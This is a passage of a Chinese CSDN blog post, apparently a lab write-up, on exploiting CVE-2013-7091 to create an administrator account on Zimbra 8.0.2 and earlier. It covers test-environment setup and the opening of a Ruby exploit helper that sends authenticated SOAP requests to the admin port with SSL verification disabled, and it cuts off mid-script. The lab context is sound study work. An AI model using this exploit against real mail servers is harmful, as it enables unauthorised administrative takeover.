利用CVE-2013-7091漏洞完成对zimbra 8.0.2以下版本的远程用户提权

本文介绍了如何利用CVE-2013-7091漏洞在zimbra 8.0.2及其以下版本中进行远程用户提权。首先,详细阐述了在ubuntu 12.04LTS环境下安装和配置zimbra 8.0.2的步骤。接着,展示了利用ruby编写的漏洞利用脚本ultils.rb和run.rb。最后,通过在开放7071端口的内网环境中运行脚本,成功创建新管理员用户,验证了漏洞利用的成功。
摘要由CSDN通过智能技术生成

一、环境安装

首先完成在ubuntu 12.04LTS环境下zimbra 8.0.2的安装及配置。

本机DNS解析:

 启动安装完毕之后的zimbra:

进入管理员界面https://mail.server2.com:7071创建两个普通帐户收发邮件测试zimbra可以正常运行:

二、创建漏洞脚本

漏洞脚本使用ruby编译,并且在windows环境下运行,共有两个rb文件。

ultils.rb:

require 'net/https'

class Utils

def request_soap_admin(*api_call*)

  @request=api_call

  

  soap_client = *Net*::*HTTP*.new( $host, 7071 )

  soap_client.use_ssl = true

  soap_client.verify_mode = *OpenSSL*::*SSL*::VERIFY_NONE

  

  soap_path = "/service/admin/soap"

  

  soap_data = "<soap:Envelope xmlns:soap=\"http://www.w3.org/2003/05/soap-envelope\"><soap:Header><context xmlns=\"urn:zimbra\"><authToken>#{$auth_key}</authToken></context></soap:Header><soap:Body>#{@request}</soap:Body></soap:Envelope>"

  

  response = soap_client.post(soap_path, soap_data, { "Content-Type" => "application/soap+xml; charset=utf-8; action=\"urn:zimbraAdmin\"" } )

  

  if response.body.match(/Error/)

​     error_res = response.body.match(/<soap:Text>(.*?)<\/soap:Text>/ui)[1]

​     puts &
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值